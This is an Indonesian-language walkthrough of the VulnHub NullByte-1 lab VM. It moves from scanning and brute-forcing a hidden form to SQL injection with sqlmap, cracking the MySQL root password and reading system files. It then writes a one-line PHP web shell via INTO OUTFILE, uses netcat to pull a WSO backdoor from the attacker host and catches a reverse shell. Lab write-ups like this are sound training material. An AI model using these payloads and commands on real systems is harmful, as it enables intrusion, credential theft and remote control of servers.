[Pentest Series] NullByte-1 Part-1
Hi semua
Kali ini saya masih menggunakan VM dari vulnhub yaitu NullByte. Silahkan download disini: https://www.vulnhub.com/entry/nullbyte-1,126/
Kalau saya nilai, sebenernya si challenge ini ga sulit2 amat. Cuman butuh banyak bruteforce sehingga mostly waktu terbuang disitu sih.
[!] VM Level: Medium
Set jaringan dan rock
Saya anggap kalian udah ngerti lah ya setup jaringan. Lakukan nmap dan kamu dapat port list seperti ini
Nmap scan report for 192.168.100.5
Host is up (0.00025s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
777/tcp open multiling-http
MAC Address: 08:00:27:86:83:73 (Oracle VirtualBox virtual NIC)
Pada fase ini, kamu boleh lakukan deep scanning dengan -p- (artinya port scan 1–65535) dan/atau -A -sV untuk mencari vulnerability terhadap service yang bersangkutan
Kalau saya langsung buka laman httpnya
Lakukan scanning directory terhadap web
Biasa, menggunakan dirb dengan standar common_web.txt. Semua wordlist saya ambil dari kali linux
---- Scanning URL: http://192.168.100.5/ ----
+ http://192.168.100.5/index.html (CODE:200|SIZE:196)
==> DIRECTORY: http://192.168.100.5/javascript/
==> DIRECTORY: http://192.168.100.5/phpmyadmin/
+ http://192.168.100.5/server-status (CODE:403|SIZE:301)
==> DIRECTORY: http://192.168.100.5/uploads/
Eh ternyata ada phpmyadmin. Tapi berhubung ga ada username/passnya yaudah skip dulu saja
Security by Obscurity
Saya sudah mencoba scan segala cara dan tidak membuahkan hasil. Disini
$ exiftool main.gif
ExifTool Version Number : 10.10
File Name : main.gif
Directory : .
File Size : 16 kB
File Modification Date/Time : 2017:02:14 21:44:22+07:00
File Access Date/Time : 2017:02:14 21:44:24+07:00
File Inode Change Date/Time : 2017:02:14 21:44:22+07:00
File Permissions : rw-rw-r--
File Type : GIF
File Type Extension : gif
MIME Type : image/gif
GIF Version : 89a
Image Width : 235
Image Height : 302
Has Color Map : No
Color Resolution Depth : 8
Bits Per Pixel : 1
Background Color : 0
Comment : P-): kzMb5nVYJw
Image Size : 235x302
Megapixels : 0.071
Saya iseng liat exifnya dan ada komentar aneh. Hmm mungkin itu direktori web? Setelah saya selidiki, muncullah form aneh seperti ini
Dan sourcenya seperti ini
<center><font color='red'>invalid key</font></center><br>
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>
Ketika mau iseng cari ada file lain yang merupakan petunjuk
---- Scanning URL: http://192.168.100.5/kzMb5nVYJw/ ----
+ http://192.168.100.5/kzMb5nVYJw/index.php (CODE:200|SIZE:187)
Oke, mau tidak mau saatnya kita bruteforce. Buka burp dan siapkan payload password guessing (cari rockyou). Kita akan melakukan bruteforce laman ini dengan burp intruder
Setelah penantian panjang…..
Ada payload key yang berbeda dengan biasanya. Mungkin itu yang terjadi kalau berhasil login, yuk mari kita coba
Kalau kamu masukkan query, nanti akan muncul request seperti ini:
http://192.168.100.5/kzMb5nVYJw/420search.php?usrtosearch=a
Yuk coba kita scan pake burp, mudah2an ada bug disini
Exploiting Bug
Sekarang gunakan SQLMap untuk melakukan eksploitasi
sqlmap.py -u "http://192.168.100.5/kzMb5nVYJw/420search.php?usrtosearch=a" -p usrtosearch --dbs --is-dba --users --passwords[22:22:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.5
[22:22:42] [INFO] testing if current user is DBA
[22:22:42] [INFO] fetching current user
current user is DBA: True
[22:22:42] [INFO] fetching database users
database management system users [6]:
[*] 'debian-sys-maint'@'localhost'
[*] 'phpmyadmin'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'nullbyte'[22:22:42] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[22:22:44] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/home/kucing/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[22:22:45] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[22:22:45] [INFO] starting dictionary-based cracking (mysql_passwd)
[22:22:45] [INFO] starting 4 processes
[22:22:53] [INFO] cracked password 'sunnyvale' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *BD9EDF51931EC5408154EBBB88AA01DA22B8A8DC
[*] phpmyadmin [1]:
password hash: *18DC78FB0C441444482C7D1132C7A23D705DAFA7
clear-text password: sunnyvale
[*] root [1]:
password hash: *18DC78FB0C441444482C7D1132C7A23D705DAFA7
clear-text password: sunnyvale[22:22:54] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] seth[22:22:54] [INFO] fetched data logged to text files under '/home/kucing/.sqlmap/output/192.168.100.5'[*] shutting down at 22:22:54
Sekarang login menggunakan root:sunnyvale
Lalu lakukan querying SQL untuk buka /etc/passwd
select CAST(load_file('/etc/passwd') AS CHAR(100000000) CHARACTER SET utf8)HASIL
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
saned:x:110:119::/var/lib/saned:/bin/false
hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
eric:x:1001:1001:,,,:/home/eric:/bin/bash
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ramses:x:1002:1002:,,,:/home/ramses:/bin/bash
Inspeksi direktori web
Sekarang coba kita bruteforce halaman konfigurasi apache. Silahkan lihat writeup saya sebelumnya mengenai lokasi kemungkinan konfigurasi
select CAST(load_file('/etc/apache2/sites-enabled/000-default.conf') AS CHAR(10000000) CHARACTER SET utf8)HASIL<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
#ServerName www.example.com
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
Tadi kalau kamu lihat atasnya, terdapat folder “uploads”.
Ya mengapa tidak kita coba? :3
select CAST(load_file('/var/www/html/uploads/index.html') AS CHAR(10000000) CHARACTER SET utf8)HASIL<html>
<head><title>Uploads dir</title></head>
<body>
<p>Directory listing not allowed here.</p>
</body>
</html>
Menulis web shell ke dalam direktori
Sekarang saatnya mencoba menulis file ke dalam direktori uploads tersebut. Dengan perintah SQL seperti ini
SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/uploads/shell.php'MySQL returned an empty result set (i.e. zero rows). (Query took 0.0003 seconds.)
Lalu coba akses dengan curl seperti ini
$ curl -X GET "192.168.100.5/uploads/shell.php?cmd=id%20;%20pwd"uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/uploads
Pastikan netcat tersedia untuk transfer file backdoor shell sebenarnya
$ curl -X GET "192.168.100.5/uploads/shell.php?cmd=which%20nc"
/bin/nc
%20 adalah pengganti spasi. Kalau kamu pake spasi ga akan bisa jalan. Kalau di browser bisa otomatis karena sudah menjadi fitur dasar untuk mengganti spasi menjadi %20
Memasukkan file backdoor WSO
Gunakan teknologi netcat untuk melakukan transfer file
$ nc -lvp 8080 < wso2.5.1.php
Listening on [0.0.0.0] (family 0, port 8080)
Dan URL yang kamu akses akan menjadi seperti ini
http://192.168.100.5/uploads/shell.php?cmd=nc%20192.168.100.3%208080%20%3E%20wso.php
Dan ini dia web backdoor yg saya maksud
Taking www-data shell
Kalau kamu membaca artikel pentest series sebelumnya. Kamu harusnya udah bisa lah ya, jadi ga perlu saya jelaskan lagi xD
$ nc -lvp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from [192.168.100.5] port 31337 [tcp/*] accepted (family 2, sport 37232)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash');"
www-data@NullByte:/var/www/html/uploads$ ppwwdd/var/www/html/uploads
www-data@NullByte:/var/www/html/uploads$ llssfile.txt index.html shell.php wso.php
www-data@NullByte:/var/www/html/uploads$ iidduid=33(www-data) gid=33(www-data) groups=33(www-data)
Ya benar, shellnya rada jelek
Epilogue
Singkat kata, ini VM sepertinya cukup mudah. Tapi cukup menarik untuk dibahas, so stay tuned ya untuk artikel selanjutnya :)
Habibie Faried
habibiefaried@gmail.com
@habibiefaried
CISSP & OSC* Wanna Be